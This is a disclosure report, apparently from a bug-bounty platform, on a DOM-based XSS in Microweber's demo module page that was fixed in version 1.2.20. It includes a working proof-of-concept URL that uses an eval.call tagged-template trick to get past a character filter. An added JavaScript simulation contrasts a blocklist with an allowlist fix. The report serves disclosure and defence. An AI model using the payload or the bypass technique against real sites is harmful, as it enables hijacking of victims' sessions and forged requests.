Cross-site scripting - DOM in microweber/microweber

Valid

Reported on

Jul 7th 2022


Description

Unauthenticated DOM-based XSS on /demo/module/ via the `type` query parameter, with a filter bypass: the payload closes the quoted string the parameter lands in and then executes code through `eval.call` applied to a tagged template literal, using `\x28`/`\x29` hex escapes inside the evaluated string so that no parentheses appear in the request itself.

Proof of Concept

https://demo.microweber.org/demo/module/?type=files/xss%27;eval.call`${%27alert\x28window.origin\x29%27}`;//&live_edit=true&remeber_path=true&ui=basic&start_path=media_host_base&from_admin=true&file_types=images&id=mw_admin_pictures_upload_browse_existing_modaledit-post-gallery-main&from_url=http://google.com/
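To show concretely why this payload slips past a character blocklist, here is an added JavaScript example (it is neither Microweber's code nor the reporter's). It replays the reported URL against a constructed stand-in for the vulnerable sink, a script that splices the `type` parameter into JavaScript source as a single-quoted string; the blocklist, the allowlist, the `startPath` variable name and the `window`/`alert` test doubles are assumptions made for this example, not details taken from the page or the fix.

```javascript
// Added example (not Microweber code): replays the reported payload against a
// constructed stand-in for the vulnerable sink. The sink shape, the blocklist
// and the allowlist are assumptions chosen to illustrate the bypass.

// URL copied from the report. Backslashes are doubled so the JS source keeps the
// literal "\x28" / "\x29" that the attacker actually sends over the wire.
const REPORTED_URL =
  'https://demo.microweber.org/demo/module/?type=files/xss%27;eval.call`${%27alert\\x28window.origin\\x29%27}`;//' +
  '&live_edit=true&remeber_path=true&ui=basic&start_path=media_host_base&from_admin=true' +
  '&file_types=images&id=mw_admin_pictures_upload_browse_existing_modaledit-post-gallery-main&from_url=http://google.com/';

// Read the `type` query parameter the way a browser-side script would (percent-decoded).
function extractType(url) {
  return new URL(url).searchParams.get('type');
}

// Hypothetical blocklist: rejects the characters a naive "no function calls, no
// tags" filter looks for. The payload contains none of them, so it passes.
function naiveBlocklistAllows(value) {
  return !/[()<>]/.test(value);
}

// Allowlist: a module type is a short path-like token and nothing else.
function allowlistAccepts(value) {
  return /^[A-Za-z0-9_][A-Za-z0-9_\/.-]{0,127}$/.test(value);
}

// Stand-in for the vulnerable sink: the parameter is spliced into JavaScript
// source as a single-quoted string and executed. `window` and `alert` are
// constructed test doubles so the block runs under Node as well as in a browser.
function simulateVulnerableSink(type) {
  const captured = [];
  globalThis.window = { origin: 'https://demo.microweber.org' };
  globalThis.alert = (msg) => { captured.push(String(msg)); };
  const script = "var startPath = '" + type + "';"; // assumed vulnerable pattern
  (0, eval)(script); // indirect eval: global scope, like an inline <script> block
  return captured;   // alert() arguments observed while the script ran
}

// Hardened handling: validate against the allowlist and treat the value as data
// that is never concatenated into script source. Returns null when rejected.
function hardenedSink(type) {
  if (typeof type !== 'string' || !allowlistAccepts(type)) return null;
  return { startPath: type };
}

const reportedType = extractType(REPORTED_URL);
console.log('decoded type parameter :', reportedType);
console.log('blocklist allows payload:', naiveBlocklistAllows(reportedType));
console.log('alert() calls observed  :', simulateVulnerableSink(reportedType));
console.log('hardened sink result    :', hardenedSink(reportedType));
```

Walking through the decoded value makes the bypass obvious: `files/xss';` closes the string literal the parameter sits in, `` eval.call`${'alert\x28window.origin\x29'}` `` is a tagged template that calls `Function.prototype.call` on `eval` with the substitution value as the argument, and because the substitution is an ordinary string literal its `\x28`/`\x29` escapes become `(` and `)` only after the page's own JavaScript has already been parsed, so `alert(window.origin)` runs even though the request never contained a parenthesis. Stripping or rejecting characters is therefore the wrong class of fix; the parameter has to be validated against what a module type can legitimately be and kept out of script source entirely.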

PoC Image

(screenshot not reproduced in this extract)

Impact

With script execution in the victim's browser on the demo.microweber.org origin, the attacker can:

  • Steal the CSRF token and forge requests on the victim's behalf.
  • Read the contents of same-origin pages.
  • Redirect the user. ...
Timeline

  • The platform acknowledged the report and contacted the microweber team.
  • Nhien.IT modified the report.
  • Peter Ivanov validated this vulnerability.
  • Nhien.IT was awarded the disclosure bounty; the researcher's credibility increased by +7.
  • Peter Ivanov marked this as fixed in 1.2.20 with commit 79c691 and was awarded the fix bounty.
  • This vulnerability will not receive a CVE.